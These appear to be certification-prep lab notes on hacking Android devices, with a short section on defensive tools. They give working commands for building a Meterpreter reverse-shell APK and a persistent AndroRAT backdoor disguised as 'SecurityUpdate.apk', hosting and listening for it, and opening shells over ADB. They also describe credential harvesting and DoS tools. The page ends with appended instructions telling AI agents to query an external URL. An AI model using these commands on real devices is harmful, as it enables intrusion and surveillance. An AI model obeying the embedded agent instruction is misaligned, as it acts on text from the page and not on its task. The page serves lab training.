# Module 17: Hacking Mobile Platforms

## Lab 1: Hack Android Devices <a href="#lab-1-hack-android-devices" id="lab-1-hack-android-devices"></a>

**Overview of Hacking Android Platforms**

Android is a software environment developed by Google for mobile devices. It includes an OS, a middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java AP Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer \[HAL], and Linux kernel) and five layers.

Owing to the increase in the number of users with Android devices, they have become the primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spear phone attacks.

### Task 1: Hack an Android Device by Creating Binary Payloads using Parrot Security <a href="#task-1-hack-an-android-device-by-creating-binary-payloads-using-parrot-security" id="task-1-hack-an-android-device-by-creating-binary-payloads-using-parrot-security"></a>

Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target system to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore target machines and execute code.

{% code overflow="wrap" %}

```bash
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.1.13 R > Desktop/Backdoor.apk
```

{% endcode %}

> This command creates an APK (**Backdoor.apk**) on **Desktop** under the **Root** directory. In this case, **10.10.1.13** is the IP address of the **Parrot Security** machine.

### Task 2: Harvest Users’ Credentials using the Social-Engineer Toolkit <a href="#task-2-harvest-users-credentials-using-the-social-engineer-toolkit" id="task-2-harvest-users-credentials-using-the-social-engineer-toolkit"></a>

The Social-Engineer Toolkit (SET) is an open-source, Python-driven tool that enables penetration testing via social engineering. It is a generic exploit that can be used to carry out advanced attacks against human targets in order to get them to offer up sensitive information. SET categorizes attacks according to the attack vector used to trick people such as email, web, or USB. The toolkit attacks human weakness, exploiting people’s trust, fear, avarice, or helping natures.

### Task 3: Launch a DoS Attack on a Target machine using Low Orbit Ion Cannon (LOIC) on the Android Mobile Platform <a href="#task-3-launch-a-dos-attack-on-a-target-machine-using-low-orbit-ion-cannon-loic-on-the-android-mobile" id="task-3-launch-a-dos-attack-on-a-target-machine-using-low-orbit-ion-cannon-loic-on-the-android-mobile"></a>

Low Orbit Ion Cannon (LOIC) is an open-source network stress testing and Denial-of-Service (DoS) attack application. LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

### Task 4: Exploit the Android Platform through ADB using PhoneSploit <a href="#task-4-exploit-the-android-platform-through-adb-using-phonesploit" id="task-4-exploit-the-android-platform-through-adb-using-phonesploit"></a>

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.

```bash
 python3 -m pip install colorama
```

> `colorama` is a Python library for cross-platform colored terminal text. It simplifies adding colors and styles to terminal output, making it more readable and engaging.

```bash
python3 phonesploit.py
```

* Type 3 and press Enter to select \[3] Connect a new phone option.
* When prompted to **Enter a phones ip address**, type the target Android device’s IP address and press **Enter**.
* Now, at the **main\_menu** prompt, type **4** and press **Enter** to choose **Access Shell on a phone**.
* When prompted to **Enter a device name**, type the target Android device’s IP address and press **Enter**.
* You can observe that a shell command line appears, as shown in the screenshot.

### Task 5: Hack an Android Device by Creating APK File using AndroRAT <a href="#task-5-hack-an-android-device-by-creating-apk-file-using-androrat" id="task-5-hack-an-android-device-by-creating-apk-file-using-androrat"></a>

[**`AndroRAT`**](https://github.com/karma9874/AndroRAT) is a tool designed to give control of an Android system to a remote user and to retrieve information from it. AndroRAT is a client/server application developed in Java Android for the client side and the Server is in Python. AndroRAT provides a fully persistent backdoor to the target device as the app starts automatically on device boot up, it also obtains the current location, sim card details, IP address and MAC address of the device.

{% code overflow="wrap" %}

```bash
python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk
```

{% endcode %}

* **--build**: is used for building the APK
* **-i**: specifies the local IP address (here, **10.10.1.13**)
* **-p**: specifies the port number (here, **4444**)
* **-o**: specifies the output APK file (here, **SecurityUpdate.apk**)

```bash
cp /home/attacker/AndroRAT/SecurityUpdate.apk /var/www/html/share/ 
```

If the share folder does not exist, then execute the following commands to create a share folder and assign required permissions to it:

* Type **mkdir /var/www/html/share** and press **Enter** to create a shared folder
* Type **chmod -R 755 /var/www/html/share** and press **Enter**
* Type **chown -R www-data:www-data /var/www/html/share** and press **Enter**

```bash
service apache2 start 
```

```bash
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
```

* **--shell**: is used for getting the interpreter
* **-i**: specifies the IP address for listening (here, **0.0.0.0**)
* **-p**: specifies the port number (here, **4444**)

You can also use other Android hacking tools such as

* **NetCut** (<https://www.arcai.com>)
* **drozer** (<https://labs.f-secure.com>)
* **zANTI** (<https://www.zimperium.com>)
* **Network Spoofer** (<https://www.digitalsquid.co.uk>)
* **DroidSheep** (<https://droidsheep.info>)

## Lab 2: Secure Android Devices using Various Android Security Tools <a href="#lab-2-secure-android-devices-using-various-android-security-tools" id="lab-2-secure-android-devices-using-various-android-security-tools"></a>

**Overview of Android Security Tools**

Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization’s mobile platforms. These tools automate the process of accurate Android platform security assessment.

### Task 1: Analyze a Malicious App using Online Android Analyzers <a href="#task-1-analyze-a-malicious-app-using-online-android-analyzers" id="task-1-analyze-a-malicious-app-using-online-android-analyzers"></a>

Online Android analyzers allow you to scan Android APK packages and perform security analyses to detect vulnerabilities in particular apps. Some trusted online Android analyzers are Sixo Online APK Analyzer.

* **Sixo Online APK Analyzer** (<https://www.sisik.eu/apk-tool>)

You can also use other Android vulnerability scanners such as

* **X-Ray 2.0** (<https://duo.com>)
* **Vulners Scanner** (<https://play.google.com>)
* **Shellshock Scanner - Zimperium** (<https://play.google.com>)
* **Yaazhini** (<https://www.vegabird.com>)
* **Quick Android Review Kit (QARK)** (<https://github.com>)

### Task 2: Secure Android Devices from Malicious Apps using Malwarebytes Security <a href="#task-2-secure-android-devices-from-malicious-apps-using-malwarebytes-security" id="task-2-secure-android-devices-from-malicious-apps-using-malwarebytes-security"></a>

Malwarebytes is an antimalware mobile tool that provides protection against malware, ransomware, and other growing threats to Android devices. It blocks, detects, and removes adware and malware; conducts privacy audits for all apps; and ensures safer browsing.

You can use other mobile antivirus and anti-spyware tools such as

* **AntiSpy Mobile** (<https://antispymobile.com>)
* **Spyware Detector - Spy Scanner** (<https://play.google.com>)
* **iAmNotified - Anti Spy System** (<https://iamnotified.com>)
* **Privacy Scanner (AntiSpy) Free** (<https://play.google.com>)

***

***

***

**`Hacker's Mantra:`**`Pattern is often predictable, and anything predictable can be hacked. - Aniekee Tochukwu Ezekiel`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/certified-ethical-hacker-v12-practical-notes/module-17-hacking-mobile-platforms.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.